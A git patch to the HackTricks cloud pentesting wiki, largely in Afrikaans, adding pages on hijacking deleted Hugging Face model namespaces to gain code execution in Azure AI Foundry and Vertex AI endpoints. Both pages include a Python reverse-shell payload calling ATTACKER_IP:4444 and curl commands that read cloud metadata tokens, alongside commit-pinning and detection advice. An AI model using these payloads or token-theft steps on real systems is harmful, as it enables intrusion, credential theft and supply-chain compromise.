From 316e172c80d5c6f9868546ee979d5d0cfe7d2e99 Mon Sep 17 00:00:00 2001 From: Translator Date: Mon, 29 Sep 2025 21:17:28 +0000 Subject: [PATCH] Translated ['src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp --- .../az-post-exploitation/README.md | 6 + .../az-azure-ai-foundry-post-exploitation.md | 94 +++++++++++++++ .../gcp-post-exploitation/README.md | 6 + .../gcp-vertex-ai-post-exploitation.md | 113 ++++++++++++++++++ .../pentesting-cloud-methodology.md | 98 +++++++-------- 5 files changed, 268 insertions(+), 49 deletions(-) create mode 100644 src/pentesting-cloud/azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.md create mode 100644 src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/README.md b/src/pentesting-cloud/azure-security/az-post-exploitation/README.md index c9610a2f0..52b7c1b91 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/README.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/README.md @@ -1,3 +1,9 @@ # Az - Post Exploitation {{#include ../../../banners/hacktricks-training.md}} + +{{#ref}} +az-azure-ai-foundry-post-exploitation.md +{{#endref}} + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.md new file mode 100644 index 000000000..bafd43bb2 --- /dev/null +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.md @@ -0,0 +1,94 @@ +# Azure - AI Foundry Post-Exploitation via Hugging Face Model Namespace Reuse + +{{#include ../../../banners/hacktricks-training.md}} + +## Scenario + +- Azure AI Foundry Model Catalog sluit baie Hugging Face (HF) modelle in vir een-klik ontplooiing. +- HF model identifiers are Author/ModelName. As 'n HF author/org verwyder word, kan enigiemand daardie author herregistreer en 'n model publiseer met dieselfde ModelName by die legacy path. +- Pipelines en catalogs wat slegs op naam trek (no commit pinning/integrity) sal oplos na attacker-controlled repos. Wanneer Azure die model ontplooi, kan loader code in die endpoint environment uitgevoer word, wat RCE gee met daardie endpoint se permissions. + +Common HF takeover cases: +- Ownership deletion: Old path 404 until takeover. +- Ownership transfer: Old path 307 to the new author while old author exists. If the old author is later deleted and re-registered, the redirect breaks and the attacker’s repo serves at the legacy path. + +## Identifying Reusable Namespaces (HF) +```bash +# Check author/org existence +curl -I https://huggingface.co/ # 200 exists, 404 deleted/available + +# Check model path +curl -I https://huggingface.co// +# 307 -> redirect (transfer case), 404 -> deleted until takeover +``` +## End-tot-end aanvalsvloei teen Azure AI Foundry + +1) In die Model Catalog, vind HF-modelle wie se oorspronklike outeurs op HF verwyder of oorgedra is (ou outeur verwyder). +2) Herregistreer die verlate outeur op HF en skep die ModelName weer. +3) Publiseer 'n kwaadwillige repo met 'n loader-code wat by import uitgevoer word of trust_remote_code=True vereis. +4) Deploy die ou Author/ModelName vanaf Azure AI Foundry. Die platform trek die aanvaller se repo; die loader word binne die Azure endpoint container/VM uitgevoer, wat RCE met endpoint permissies lewer. + +Voorbeeld payload-fragment wat by import uitgevoer word (slegs vir demonstrasie): +```python +# __init__.py or a module imported by the model loader +import os, socket, subprocess, threading + +def _rs(host, port): +s = socket.socket(); s.connect((host, port)) +for fd in (0,1,2): +try: +os.dup2(s.fileno(), fd) +except Exception: +pass +subprocess.call(["/bin/sh","-i"]) # or powershell on Windows images + +if os.environ.get("AZUREML_ENDPOINT","1") == "1": +threading.Thread(target=_rs, args=("ATTACKER_IP", 4444), daemon=True).start() +``` +Aantekeninge +- AI Foundry deployments wat HF integreer kloon gewoonlik en importeer repo modules wat in die model se config verwys (bv. auto_map), wat code execution kan veroorsaak. Sommige paaie vereis trust_remote_code=True. +- Toegang stem gewoonlik ooreen met die endpoint se managed identity/service principal permissions. Beskou dit as 'n initial access foothold vir data access en lateral movement binne Azure. + +## Post-Exploitation Tips (Azure Endpoint) + +- Enumereer omgewingsveranderlikes en MSI endpoints vir tokens: +```bash +# Azure Instance Metadata Service (inside Azure compute) +curl -H "Metadata: true" \ +"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" +``` +- Kontroleer mounted storage, model artifacts, en bereikbare Azure-dienste met die verkrygde token. +- Oorweeg persistence deur poisoned model artifacts agter te laat as die platform weer vanaf HF re-pulls. + +## Verdedigingsriglyne vir gebruikers van Azure AI Foundry + +- Pin models by commit wanneer vanaf HF gelaai word: +```python +from transformers import AutoModel +m = AutoModel.from_pretrained("Author/ModelName", revision="") +``` +- Spieël geverifieerde HF-modelle na 'n betroubare interne register en implementeer daarvandaan. +- Skandeer deurlopend kodebasisse en defaults/docstrings/notebooks vir hard-coded Author/ModelName wat verwyder of oorgedra is; werk dit by of pin dit. +- Valideer die bestaan van die auteur en die herkoms van die model voor implementering. + +## Herkenningsheuristieke (HTTP) + +- Verwyderde auteur: auteurbladsy 404; legacy modelpad 404 totdat dit oorgeneem word. +- Oorgedra model: legacy-pad 307 na nuwe auteur terwyl die ou auteur bestaan; as die ou auteur later verwyder en weer geregistreer word, bedien die legacy-pad inhoud van 'n aanvaller. +```bash +curl -I https://huggingface.co// | egrep "^HTTP|^location" +``` +## Kruisverwysings + +- Sien breër metodologie- en voorsieningskettingaantekeninge: + +{{#ref}} +../../pentesting-cloud-methodology.md +{{#endref}} + +## Verwysings + +- [Model Namespace Reuse: An AI Supply-Chain Attack Exploiting Model Name Trust (Unit 42)](https://unit42.paloaltonetworks.com/model-namespace-reuse/) +- [Hugging Face: Renaming or transferring a repo](https://huggingface.co/docs/hub/repositories-settings#renaming-or-transferring-a-repo) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md index b16f7d106..8f4597e1a 100644 --- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md @@ -1,3 +1,9 @@ # GCP - Post Exploitation {{#include ../../../banners/hacktricks-training.md}} + +{{#ref}} +gcp-vertex-ai-post-exploitation.md +{{#endref}} + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md new file mode 100644 index 000000000..dad2f3718 --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md @@ -0,0 +1,113 @@ +# GCP - Vertex AI Post-Exploitation via Hugging Face Model Namespace Reuse + +{{#include ../../../banners/hacktricks-training.md}} + +## Senario + +- Vertex AI Model Garden maak die direkte ontplooiing van baie Hugging Face (HF) models moontlik. +- HF model identifiers are Author/ModelName. As 'n author/org op HF verwyder word, kan dieselfde author-naam deur enigiemand weer geregistreer word. Attackers kan dan 'n repo met dieselfde ModelName op die legacy path skep. +- Pipelines, SDKs, or cloud catalogs wat slegs per naam haal (no pinning/integrity) sal die attacker-controlled repo trek. Wanneer die model ontplooi word, kan loader code vanaf daardie repo binne die Vertex AI endpoint-container uitgevoer word, wat RCE met die endpoint se permissies oplewer. + +Twee algemene takeover-gevalle op HF: +- Ownership deletion: Ou pad 404 totdat iemand die author weer registreer en dieselfde ModelName publiseer. +- Ownership transfer: HF issue 307 redirects vanaf die ou Author/ModelName na die nuwe author. As die ou author later verwyder en deur 'n attacker herregistreer word, word die redirect-ketting gebreek en die attacker se repo bedien by die legacy path. + +## Identifisering van herbruikbare namespaces (HF) + +- Ou author verwyder: die bladsy vir die author gee 404 terug; die model pad mag 404 teruggee totdat takeover. +- Transferred models: die ou model pad issue 307 na die nuwe owner terwyl die ou author bestaan. As die ou author later verwyder en weer geregistreer word, sal die legacy path na die attacker se repo oplos. + +Vinnige kontroles met curl: +```bash +# Check author/org existence +curl -I https://huggingface.co/ +# 200 = exists, 404 = deleted/available + +# Check old model path behavior +curl -I https://huggingface.co// +# 307 = redirect to new owner (transfer case) +# 404 = missing (deletion case) until someone re-registers +``` +## End-to-end aanvalsvloei teen Vertex AI + +1) Ontdek herbruikbare model namespaces wat Model Garden as deployable gelys: +- Vind HF-modelle in Vertex AI Model Garden wat steeds as “verified deployable” vertoon. +- Verifieer op HF of die oorspronklike author uitgevee is, of die model oorgedra is en die ou author later verwyder is. + +2) Herregistreer die uitgevee author op HF en skep dieselfde ModelName weer. + +3) Publiseer 'n kwaadwillige repo. Sluit kode in wat by die model se laai uitgevoer word. Voorbeelde wat algemeen tydens HF model load uitgevoer word: +- Side effects in __init__.py of the repo +- Aangepaste modeling_*.py of processing code wat deur config/auto_map verwys word +- Kodepade wat trust_remote_code=True in Transformers pipelines vereis + +4) 'n Vertex AI deployment van die legacy Author/ModelName trek nou die attacker repo. Die loader word binne die Vertex AI endpoint container uitgevoer. + +5) Die payload vestig toegang vanaf die endpoint-omgewing (RCE) met die endpoint se permissies. + +Example payload fragment executed on import (for demonstration only): +```python +# Place in __init__.py or a module imported by the model loader +import os, socket, subprocess, threading + +def _rs(host, port): +s = socket.socket(); s.connect((host, port)) +for fd in (0,1,2): +try: +os.dup2(s.fileno(), fd) +except Exception: +pass +subprocess.call(["/bin/sh","-i"]) # Or python -c exec ... + +if os.environ.get("VTX_AI","1") == "1": +threading.Thread(target=_rs, args=("ATTACKER_IP", 4444), daemon=True).start() +``` +Aantekeninge +- In die werklike lewe verskil loaders. Baie Vertex AI HF integrations kloon en importeer repo modules wat in die model se config verwys word (bv. auto_map), wat code execution kan trigger. Sommige gebruiksgevalle vereis trust_remote_code=True. +- Die endpoint hardloop tipies in ’n toegewyde container met beperkte omvang, maar dit is ’n geldige aanvanklike foothold vir data-toegang en laterale beweging in GCP. + +## Post-Exploitation Wenke (Vertex AI Endpoint) + +Sodra code binne die endpoint container loop, oorweeg: +- Enumereer environment variables en metadata vir credentials/tokens +- Toegang tot aangehegte storage of mounted model artifacts +- Interageer met Google APIs via service account identity (Document AI, Storage, Pub/Sub, etc.) +- Persistensie in die model artifact indien die platform die repo weer herlaai + +Enumereer instance metadata indien toeganklik (container-afhanklik): +```bash +curl -H "Metadata-Flavor: Google" \ +http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token +``` +## Verdedigende riglyne vir Vertex AI-gebruikers + +- Pin modelle per commit in HF loaders om stille vervanging te voorkom: +```python +from transformers import AutoModel +m = AutoModel.from_pretrained("Author/ModelName", revision="") +``` +- Spieël geverifieerde HF-modelle na 'n betroubare interne artefakstoor/registrasie en ontplooi van daar. +- Skandeer voortdurend codebases en configs vir hard-gekodeerde Author/ModelName wat verwyder of oorgedra is; werk na nuwe namespaces of pin per commit. +- In Model Garden, verifieer modelherkoms en die bestaan van die skrywer voordat ontplooiing plaasvind. + +## Herkenningsheuristieke (HTTP) + +- Verwyderde skrywer: skrywersbladsy 404; erfenis modelpad 404 tot oorname. +- Oorgedra model: erfenispad 307 na nuwe skrywer terwyl die ou skrywer nog bestaan; as die ou skrywer later verwyder en weer geregistreer word, dien die erfenispad aanvallerinhoud. +```bash +curl -I https://huggingface.co// | egrep "^HTTP|^location" +``` +## Kruisverwysings + +- Sien breër metodologie- en voorsieningskettingnotas: + +{{#ref}} +../../pentesting-cloud-methodology.md +{{#endref}} + +## Verwysings + +- [Model Namespace Reuse: An AI Supply-Chain Attack Exploiting Model Name Trust (Unit 42)](https://unit42.paloaltonetworks.com/model-namespace-reuse/) +- [Hugging Face: Renaming or transferring a repo](https://huggingface.co/docs/hub/repositories-settings#renaming-or-transferring-a-repo) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/pentesting-cloud-methodology.md b/src/pentesting-cloud/pentesting-cloud-methodology.md index 88b9c5040..57970d833 100644 --- a/src/pentesting-cloud/pentesting-cloud-methodology.md +++ b/src/pentesting-cloud/pentesting-cloud-methodology.md @@ -4,41 +4,41 @@
-## Basic Methodology +## Basiese Metodologie -Elke wolk het sy eie eienaardighede, maar oor die algemeen is daar 'n paar **gemeenskaplike dinge wat 'n pentester moet nagaan** wanneer 'n wolkomgewing getoets word: +Elke cloud het sy eie eienaardighede maar oor die algemeen is daar 'n paar **gemeenskaplike dinge wat 'n pentester moet nagaan** wanneer 'n cloud-omgewing getoets word: - **Benchmark kontroles** -- Dit sal jou help om **die grootte** van die omgewing en **dienste wat gebruik word** te **begryp**. -- Dit sal jou ook toelaat om 'n paar **vinnige miskonfigurasies** te vind, aangesien jy die meeste van hierdie toetse met **geoutomatiseerde gereedskap** kan uitvoer. -- **Dienste Enumerasie** -- Jy sal waarskynlik nie veel meer miskonfigurasies hier vind as jy die benchmark toetse korrek uitgevoer het nie, maar jy mag dalk sommige vind wat nie in die benchmark toets gesoek is nie. -- Dit sal jou toelaat om te weet **wat presies gebruik word** in die wolkomgewing. -- Dit sal baie help in die volgende stappe. -- **Kontroleer blootgestelde bates** -- Dit kan gedoen word tydens die vorige afdeling, jy moet **uitvind alles wat potensieel blootgestel is** aan die Internet op een of ander manier en hoe dit toegang kan verkry. -- Hier neem ek **handmatig blootgestelde infrastruktuur** soos instansies met webbladsye of ander poorte wat blootgestel word, en ook oor ander **wolkkontroleerde dienste wat geconfigureer kan word** om blootgestel te word (soos DB's of emmers). -- Dan moet jy nagaan **of daardie hulpbron blootgestel kan word of nie** (vertroulike inligting? kwesbaarhede? miskonfigurasies in die blootgestelde diens?). -- **Kontroleer toestemmings** -- Hier moet jy **alle toestemmings van elke rol/gebruiker** binne die wolk uitvind en hoe dit gebruik word. -- Te **veel hoogs bevoorregte** (beheer alles) rekeninge? Gekreëerde sleutels wat nie gebruik word?... Die meeste van hierdie kontroles moes reeds in die benchmark toetse gedoen gewees het. -- As die kliënt OpenID of SAML of ander **federasie** gebruik, mag jy hulle moet vra vir verdere **inligting** oor **hoe elke rol toegeken word** (dit is nie dieselfde as om die admin rol aan 1 gebruiker of aan 100 toe te ken nie). -- Dit is **nie genoeg om te vind** watter gebruikers **admin** toestemmings het "\*:\*". Daar is baie **ander toestemmings** wat, afhangende van die dienste wat gebruik word, baie **sensitief** kan wees. -- Boonop is daar **potensiële privesc** maniere om te volg deur toestemmings te misbruik. Al hierdie dinge moet in ag geneem word en **so veel privesc paaie as moontlik** moet gerapporteer word. +- Dit sal jou help om die **grootte van die omgewing** en die **gebruikte dienste** te verstaan +- Dit sal jou ook toelaat om 'n paar **vinnige miskonfigurasies** te vind aangesien jy die meeste van hierdie toetse met **geoutomatiseerde gereedskap** kan uitvoer +- **Services Enumeration** +- Jy sal waarskynlik nie baie meer miskonfigurasies hier vind as jy die benchmark-toetse korrek uitgevoer het nie, maar jy kan dalk sommige vind wat nie in die benchmark-toets nagegaan is nie. +- Dit sal jou toelaat om te weet **wat presies in die cloud-omgewing gebruik word** +- Dit sal baie help in die volgende stappe +- **Kontroleer blootgestelde assets** +- Dit kan gedoen word tydens die vorige afdeling; jy moet **uitvind alles wat potensieel blootgestel is** aan die Internet op een of ander manier en hoe dit benader kan word. +- Hier bedoel ek **manueel blootgestelde infrastruktuur** soos instances met webblaaie of ander poorte wat blootgestel is, en ook ander **cloud managed services wat gekonfigureer kan word** om blootgestel te word (soos DBs of buckets) +- Dan moet jy nagaan **of daardie hulpbron blootgestel kan word of nie** (konfidensiële inligting? vulnerabilities? miskonfigurasies in die blootgestelde diens?) +- **Kontroleer permissies** +- Hier moet jy **uitvind al die permissies van elke rol/gebruiker** binne die cloud en hoe dit gebruik word +- Te **baie hoogs geprivilegieerde** (beheer alles) rekeninge? Gegenereerde sleutels nie gebruik nie? ... Die meeste van hierdie kontroles behoort reeds in die benchmark-toetse gedoen te wees +- As die kliënt OpenID of SAML of ander **federation** gebruik, moet jy hulle dalk vra vir verdere **inligting** oor **hoe elke rol toegewys word** (dit is nie dieselfde dat die admin-rol aan 1 gebruiker of aan 100 toegeken is nie) +- Dit is **nie genoeg om te vind** watter gebruikers **admin** permissies "*:*" het nie. Daar is baie **ander permissies** wat, afhangende van die dienste wat gebruik word, baie **sensitief** kan wees. +- Boonop is daar **potensiële privesc** maniere om te volg deur permissies te misbruik. Al hierdie dinge moet in ag geneem word en **soveel privesc-paaie as moontlik** moet gerapporteer word. - **Kontroleer Integrasies** -- Dit is hoogs waarskynlik dat **integrasies met ander wolke of SaaS** binne die wolkomgewing gebruik word. -- Vir **integrasies van die wolk wat jy oudit** met ander platforms moet jy **ken wie toegang het tot (mis)bruik daardie integrasie** en jy moet vra **hoe sensitief** die aksie wat uitgevoer word is.\ -Byvoorbeeld, wie kan skryf in 'n AWS-emmer waar GCP data van ontvang (vra hoe sensitief die aksie in GCP is wat daardie data hanteer). -- Vir **integrasies binne die wolk wat jy oudit** van eksterne platforms, moet jy vra **wie toegang het van buite om (mis)bruik te maak van daardie integrasie** en nagaan hoe daardie data gebruik word.\ -Byvoorbeeld, as 'n diens 'n Docker-beeld gebruik wat in GCR gehos is, moet jy vra wie toegang het om dit te wysig en watter sensitiewe inligting en toegang daardie beeld sal kry wanneer dit binne 'n AWS-wolk uitgevoer word. +- Dit is hoogs waarskynlik dat **integrasies met ander clouds of SaaS** binne die cloud-omgewing gebruik word. +- Vir **integrations of the cloud you are auditing** met ander platform, moet jy kennis gee wie toegang het om daardie integrasie te (ab)use en jy moet vra hoe **sensitief** die aksie is wat uitgevoer word.\ +Byvoorbeeld, wie kan skryf in 'n AWS bucket waar GCP data vandaan kry (vra hoe sensitief die aksie is in GCP wanneer daardie data verwerk word). +- Vir **integrations inside the cloud you are auditing** vanaf eksterne platforms, moet jy vra **wie ekstern toegang het om daardie integrasie te (ab)use** en nagaan hoe daardie data gebruik word.\ +Byvoorbeeld, as 'n diens 'n Docker image gebruik wat in GCR gehuisves is, moet jy vra wie toegang het om dit te wysig en watter sensitiewe inligting en toegang daardie image sal kry wanneer dit binne 'n AWS cloud uitgevoer word. -## Multi-Cloud tools +## Multi-Cloud gereedskap -Daar is verskeie gereedskap wat gebruik kan word om verskillende wolkomgewings te toets. Die installasietappe en skakels sal in hierdie afdeling aangedui word. +Daar is verskeie gereedskap wat gebruik kan word om verskillende cloud-omgewings te toets. Die installasiestappe en skakels sal in hierdie afdeling aangedui word. ### [PurplePanda](https://github.com/carlospolop/purplepanda) -'n Gereedskap om **slegte konfigurasies en privesc paaie in wolke en oor wolke/SaaS te identifiseer.** +A tool to **identify bad configurations and privesc path in clouds and across clouds/SaaS.** {{#tabs }} {{#tab name="Install" }} @@ -71,7 +71,7 @@ python3 main.py -e -p google #Enumerate the env ### [Prowler](https://github.com/prowler-cloud/prowler) -Dit ondersteun **AWS, GCP & Azure**. Kyk hoe om elke verskaffer te konfigureer in [https://docs.prowler.cloud/en/latest/#aws](https://docs.prowler.cloud/en/latest/#aws) +Dit ondersteun **AWS, GCP & Azure**. Kyk hoe om elke provider te konfigureer by [https://docs.prowler.cloud/en/latest/#aws](https://docs.prowler.cloud/en/latest/#aws) ```bash # Install pip install prowler @@ -91,7 +91,7 @@ prowler --list-services AWS, Azure, Github, Google, Oracle, Alibaba {{#tabs }} -{{#tab name="Installeer" }} +{{#tab name="Install" }} ```bash # Install git clone https://github.com/aquasecurity/cloudsploit.git @@ -115,7 +115,7 @@ npm install AWS, Azure, GCP, Alibaba Cloud, Oracle Cloud Infrastructure {{#tabs }} -{{#tab name="Installeer" }} +{{#tab name="Install" }} ```bash mkdir scout; cd scout virtualenv -p python3 venv @@ -145,7 +145,7 @@ done ### [Steampipe](https://github.com/turbot) {{#tabs }} -{{#tab name="Installeer" }} +{{#tab name="Install" }} Laai Steampipe af en installeer dit ([https://steampipe.io/downloads](https://steampipe.io/downloads)). Of gebruik Brew: ``` brew tap turbot/tap @@ -170,7 +170,7 @@ steampipe check all Kontroleer alle Projekte -Om al die projekte te kontroleer, moet jy die `gcp.spc` lêer genereer wat al die projekte aandui wat getoets moet word. Jy kan net die aanduidings van die volgende skrif volg. +Om al die projekte te kontroleer, moet jy die `gcp.spc`-lêer genereer wat al die projekte aandui wat getoets moet word. Jy kan net die instruksies van die volgende script volg ```bash FILEPATH="/tmp/gcp.spc" rm -rf "$FILEPATH" 2>/dev/null @@ -194,11 +194,11 @@ echo "Copy $FILEPATH in ~/.steampipe/config/gcp.spc if it was correctly generate ``` -Om **ander GCP insigte** te kontroleer (nuttig vir die opspoor van dienste) gebruik: [https://github.com/turbot/steampipe-mod-gcp-insights](https://github.com/turbot/steampipe-mod-gcp-insights) +Om **ander GCP-insigte** te kontroleer (nuttig vir die enumerering van dienste) gebruik: [https://github.com/turbot/steampipe-mod-gcp-insights](https://github.com/turbot/steampipe-mod-gcp-insights) -Om Terraform GCP kode te kontroleer: [https://github.com/turbot/steampipe-mod-terraform-gcp-compliance](https://github.com/turbot/steampipe-mod-terraform-gcp-compliance) +Om Terraform GCP code te kontroleer: [https://github.com/turbot/steampipe-mod-terraform-gcp-compliance](https://github.com/turbot/steampipe-mod-terraform-gcp-compliance) -Meer GCP plugins van Steampipe: [https://github.com/turbot?q=gcp](https://github.com/turbot?q=gcp) +Meer GCP-plugins van Steampipe: [https://github.com/turbot?q=gcp](https://github.com/turbot?q=gcp) {{#endtab }} {{#tab name="AWS" }} @@ -225,9 +225,9 @@ cd steampipe-mod-aws-compliance steampipe dashboard # To see results in browser steampipe check all --export=/tmp/output4.json ``` -Om Terraform AWS kode te kontroleer: [https://github.com/turbot/steampipe-mod-terraform-aws-compliance](https://github.com/turbot/steampipe-mod-terraform-aws-compliance) +To check Terraform AWS code: [https://github.com/turbot/steampipe-mod-terraform-aws-compliance](https://github.com/turbot/steampipe-mod-terraform-aws-compliance) -Meer AWS-inproppe van Steampipe: [https://github.com/orgs/turbot/repositories?q=aws](https://github.com/orgs/turbot/repositories?q=aws) +More AWS plugins of Steampipe: [https://github.com/orgs/turbot/repositories?q=aws](https://github.com/orgs/turbot/repositories?q=aws) {{#endtab }} {{#endtabs }} @@ -238,11 +238,11 @@ Dit vereis python2.7 en lyk ononderhou. ### Nessus -Nessus het 'n _**Audit Cloud Infrastructure**_ skandering wat ondersteun: AWS, Azure, Office 365, Rackspace, Salesforce. Sommige ekstra konfigurasies in **Azure** is nodig om 'n **Client Id** te verkry. +Nessus het 'n _**Audit Cloud Infrastructure**_ scan wat ondersteun: AWS, Azure, Office 365, Rackspace, Salesforce. Sommige ekstra konfigurasies in **Azure** is nodig om 'n **Client Id** te bekom. ### [**cloudlist**](https://github.com/projectdiscovery/cloudlist) -Cloudlist is 'n **multi-cloud hulpmiddel om Bate** (Gasname, IP Adresse) van Cloud Verskaffers te verkry. +Cloudlist is 'n **multi-cloud tool for getting Assets** (Hostnames, IP Addresses) vanaf Cloud Providers. {{#tabs }} {{#tab name="Cloudlist" }} @@ -265,7 +265,7 @@ cloudlist -config ### [**cartography**](https://github.com/lyft/cartography) -Cartography is 'n Python-gereedskap wat infrastruktuur bates en die verhoudings tussen hulle in 'n intuïtiewe grafiekweergave saamvoeg, aangedryf deur 'n Neo4j-databasis. +Cartography is 'n Python-hulpmiddel wat infrastruktuur-bates en die verhoudings tussen hulle konsolideer in 'n intuïtiewe grafiese aansig wat deur 'n Neo4j-databasis aangedryf word. {{#tabs }} {{#tab name="Install" }} @@ -302,7 +302,7 @@ ghcr.io/lyft/cartography \ ### [**starbase**](https://github.com/JupiterOne/starbase) -Starbase versamel bates en verhoudings van dienste en stelsels, insluitend wolkinfrastruktuur, SaaS-toepassings, sekuriteitsbeheer, en meer in 'n intuïtiewe grafiekweergave wat deur die Neo4j-databasis ondersteun word. +Starbase versamel bates en verhoudings van dienste en stelsels, insluitend cloud infrastruktuur, SaaS-toepassings, sekuriteitskontroles en meer, in 'n intuïtiewe grafiek-uitsig wat deur die Neo4j-databasis ondersteun word. {{#tabs }} {{#tab name="Install" }} @@ -361,7 +361,7 @@ uri: bolt://localhost:7687 ### [**SkyArk**](https://github.com/cyberark/SkyArk) -Ontdek die mees bevoorregte gebruikers in die gescande AWS of Azure omgewing, insluitend die AWS Shadow Admins. Dit gebruik powershell. +Ontdek die gebruikers met die hoogste voorregte in die gescande AWS- of Azure-omgewing, insluitend die AWS Shadow Admins. Dit gebruik powershell. ```bash Import-Module .\SkyArk.ps1 -force Start-AzureStealth @@ -372,15 +372,15 @@ Scan-AzureAdmins ``` ### [Cloud Brute](https://github.com/0xsha/CloudBrute) -'n Gereedskap om 'n maatskappy (teiken) infrastruktuur, lêers en toepassings op die top wolkverskaffers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode) te vind. +'n gereedskap om 'n maatskappy (teiken) se infrastruktuur, lêers en apps op die top cloud-aanbieders (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode) te vind. ### [CloudFox](https://github.com/BishopFox/cloudfox) -- CloudFox is 'n gereedskap om uitbuitbare aanvalspaaie in wolkinfrastruktuur te vind (huidiglik slegs AWS & Azure ondersteun met GCP wat kom). -- Dit is 'n enumerasie-gereedskap wat bedoel is om handmatige pentesting aan te vul. -- Dit skep of wysig nie enige data binne die wolkomgewing nie. +- CloudFox is 'n gereedskap om exploitable attack paths in cloud infrastructure te vind (tans slegs AWS & Azure ondersteun met GCP binnekort). +- Dit is 'n enumeration tool wat bedoel is om manuele pentesting aan te vul. +- Dit skep of wysig geen data binne die cloud-omgewing nie. -### Meer lyste van wolk sekuriteitsgereedskap +### More lists of cloud security tools - [https://github.com/RyanJarv/awesome-cloud-sec](https://github.com/RyanJarv/awesome-cloud-sec) @@ -410,12 +410,12 @@ aws-security/ azure-security/ {{#endref}} -### Aanval Grafiek +### Attack Graph -[**Stormspotter** ](https://github.com/Azure/Stormspotter) skep 'n “aanval grafiek” van die hulpbronne in 'n Azure intekening. Dit stel rooi span en pentesters in staat om die aanvaloppervlak en draaipunte binne 'n huurder te visualiseer, en versterk jou verdedigers om vinnig te oriënteer en prioriteit te gee aan insidentresponswerk. +[**Stormspotter** ](https://github.com/Azure/Stormspotter) skep 'n “attack graph” van die resources in 'n Azure subscription. Dit stel red teams en pentesters in staat om die attack surface en pivot opportunities binne 'n tenant te visualiseer, en gee jou defenders 'n reuse hupstoot om vinnig te oriënteer en incident response werk te prioritiseer. ### Office365 -Jy het **Global Admin** of ten minste **Global Admin Reader** nodig (maar let daarop dat Global Admin Reader 'n bietjie beperk is). Hierdie beperkings verskyn egter in sommige PS-modules en kan omseil word deur toegang te verkry tot die funksies **via die webtoepassing**. +Jy het **Global Admin** of ten minste **Global Admin Reader** nodig (maar let wel dat Global Admin Reader ietwat beperk is). Hierdie beperkings verskyn egter in sommige PS modules en kan omseil word deur die funksies via die webtoepassing te gebruik. {{#include ../banners/hacktricks-training.md}}